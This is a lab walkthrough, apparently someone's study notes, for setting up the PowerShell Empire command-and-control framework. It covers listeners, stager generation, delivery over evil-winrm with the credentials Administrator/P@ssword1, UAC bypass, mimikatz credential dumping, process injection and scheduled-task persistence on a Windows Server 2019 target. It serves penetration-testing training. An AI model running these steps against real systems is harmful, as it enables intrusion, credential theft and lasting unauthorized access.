C2 OPERATION:

  1. Power on the main Kali Linux virtual machine (not the clone), open the Terminal, and use the ifconfig eth0{whatever interface you are having as NAT} command to determine the IP address on the eth0 interface as shown below: c2_op_1
  2. This ip address will act as an empire server , while the clone vm will act as a empire client .
  3. Start the maria DB service in the kali vm(not the clone) : c2_op_2
  4. Next, use the following commands to start the Empire server on the main Kali Linux virtual machine:
sudo powershell-empire server

c2_op_3 5. Next, power on the Empire Client (clone of Kali Linux) virtual machine and use the following commands to edit the Empire client configuration file to insert the Empire server information:

sudo nano /etc/powershell-empire/client/config.yaml
  1. Paste the following code snippet at the end of the server’s list:
Empire-Server:
host: http://192.168.83.128 # main kali ip to connect the client with it
port: 1337
socketport: 5000
username: empireadmin
password: password123

c2_op_4 7. Now start the empire client from the cloned kali:

sudo systemctl start mariadb.service
sudo powershell-empire client

c2_op_5 8. Establishing the connection to empire server, before that make sure your main kali machine’s firewall is not blocking the tcp port 1337 for incoming connections, follow the commands:

# on main kali machine
sudo ufw status
sudo ufw allow 1337/tcp

c2_op_6

# on EMPIRE CLIENT machine
(Empire) > connect -c Empire-Server

c2_op_7 c2_op_8

we can do the same steps inside one kali machine also, by the help of different tabs.


Managing users on Empire:

  1. On the Empire client console, execute the following commands to access the administrative menu and view the list of current user accounts:
(Empire) > admin
(Empire: admin) > user_list

c2_op_9 2. To create a new user on the Empire server, use the create_user command with the username as NewUser1 and the password as Password123, followed by the authoritative user (admin) for creating the account:

(Empire: admin) > create_user NewUser1 Password123 Password123 admin (Empire: admin) > user_list

c2_op_10 3. To disable an user account use the disable_user <User_id> command:

(Empire: admin) > disable_user 1001
  1. To view a list of available commands/options under a context menu, use the `help command.
  2. Using the back command will return you to the previous menu and the main command will carry you to the main menu within Empire.

Post exploitation using Empire:

  1. We will be using our windows serverr 2019 as a target system for this exercise.

Creating a listener:

  1. A listener is a module within the Empire server that listens for an incoming connection from an agent running on a compromised host. Without a listener on the Empire server, you won’t be able to send instructions to the agents that are running on the compromised systems.
  2. On the empire client console , use the following command to setup a HTTP listener
(Empire) > uselistener http

c2_op_11 3. Change the name of the default listener using the command set Name <New_name>

(Empire: uselistener/http) > set Name DC_Listener
  1. Next, you will need to configure the callback host settings. This is the IP address on the eth0 interface of your Kali Linux machine on the (192.168.83.0/24) network that is running the Empire server:
(Empire: uselistener/http) > set Host 192.168.83.128
(Empire: uselistener/http) > set Port 1335 # allowed the connection on my main kali before running this command
  1. Type options to verify the changes.
  2. Run the listener using the command execute
  3. Use the back command to come back a few times{optional}, and then use the command listeners to see your listeners that been setup by you:
(Empire: uselistener/http) > listeners

c2_op_12 The listener has been setup and waiting for incoming connections.


Creating a stager:

A stager is a module within Empire that allows penetration testers to execute the agent (payload) on the targeted system. When an agent is executed on a compromised host, it will attempt to establish a connection back to the listener on the Empire server running on Kali Linux. This allows the penetration tester to perform post-exploitation tasks on any active agents.

  1. On the Empire client console, let’s create a multi-launcher stager by using the following command:
(Empire) > usestager multi_launcher

c2_op_13 2. Next, set the listener option to DC_Listener:

(Empire: usestager/multi_launcher) > set Listener DC_Listener
  1. Generate the stager malicious powershell code using the command generate
(Empire: usestager/multi_launcher) > generate

c2_op_14 4. Next, open a new Terminal on main kali and use Evil-WinRM to establish a PowerShell session on the windows server 2019

evil-winrm -i 192.168.83.140 -u Administrator -p P@ssword1

c2_op_15 5. Then paste the malicious code into this evil-winrm session. c2_op_16 c2_op_17


working with agents:

  1. To view a list of agents inside empire client use the command agents c2_op_18

I am having multiple sessions, but you should have one session for now. 2. Whenever you will see an astrick(*) with the name of the agent, that means we are running with the elevated privileges. 3. To interact with an agent use the command interact <egnt_id> c2_op_19 use the help command for available commands we can run c2_op_20 c2_op_21 4. Additionally, to determine whether the agent is running with elevated privileges on the compromised host, use the following command:

(Empire: YDPKMU42) > display high_integrity

c2_op_22 5. If the agent is not running with elevated privileges, you can use the bypassuac command to escalate the privileges:

bypassuac DC_Listener
  1. To remotely execute a command on the compromised host, use the shell <command> command:
(Empire: YDPKMU42) > shell whoami
(Empire: YDPKMU42) > shell ipconfig

c2_op_23 7. Running mimikatz for credential dumping: c2_op_24 8. To see the loot use the command credentials c2_op_25


Creating a new agent:

During a penetration test, having multiple connections or reverse shells on compromised hosts will prove to be especially useful in the event one shell should unexpectedly be terminated. Using Empire, you can create multiple agents on the same compromised host using an existing agent, by using the following instructions, although i am already running 2 shells of the same machine and used 2 different agents:

  1. Interact with the agent first: c2_op_26
  2. List all the processes using the ps command c2_op_27
  3. We can use the PID of a common, less-suspecting process, such as wsmprovhost, on the compromised host to spawn a new agent. c2_op_28
  4. Creating a new agent using psinject command on the compromised host:
(Empire: CSM26U8L) > psinject DC_Listener 2268

c2_op_29 5. As shown in the preceding screenshot, the new agent has spawned. However, notice the new agent is created with elevated privileges because wsmprovhost was running using the local Administrator account. If the new agent is not running with elevated privileges, you won’t be able to perform administrative or high-privilege tasks on the compromised host. You will need to elevate the privileges of the new agent to do so. 6. Use the following commands to interact with the compromised host and spawn a command shell into empire client c2_op_30


Threat emulation:

Threat emulation focuses on testing the cyber defenses of an organization and their capabilities to detect and prevent various techniques used by threat actors. Improving threat emulation using Empire during a penetration test engagement tests whether a targeted organization can detect unknown threats disguised in common network traffic such as Windows updates, Gmail, and Office 365 traffic types.

  1. On the Empire client use the http_mellable listener module:
(Empire: agents) > uselistener http_malleable

c2_op_31 2. Follow the given screenshots for setting up the listener: c2_op_32 use the port 9443 Also make sure in your server machine , incoming connections are allowed on this port for reverse shells: c2_op_33 3. Then create a new stager for the listener ThreatEmulation: c2_op_34 c2_op_35 4. Then paste and execute the malicious code inside the evil winrm session of the target: c2_op_36 5. You should be able to see a new session checked in inside the empire client c2_op_37 6. Interact with the agent: c2_op_38 c2_op_39


Setting up persistence:

Establishing persistence on a compromised host will ensure you have access to the host at any time when it is online on the target network. It’s important to note that persistent access should be maintained on the compromised host even after the system reboots or security measures are applied. But during penetration tests we need to make sure this step is part of the engagement.

Important

When setting up persistence, please be mindful that the persistence modules may create intentional backdoors on the compromised systems, which may allow other threat actors to gain access. Persistence should only be used during a penetration test if it is needed or within the scope of the engagement. If you set up persistence on compromised hosts during your penetration test, be sure to remove it at the end of your penetration test to prevent unauthorized access by other threat actors.

  1. Start by interacting with an active agent with elevated privileges and use the scheduled task persistence module:
(Empire: X65ZRGUH) > usemodule powershell_persistence_elevated_schtasks

c2_op_40 2. Options and execution: c2_op_41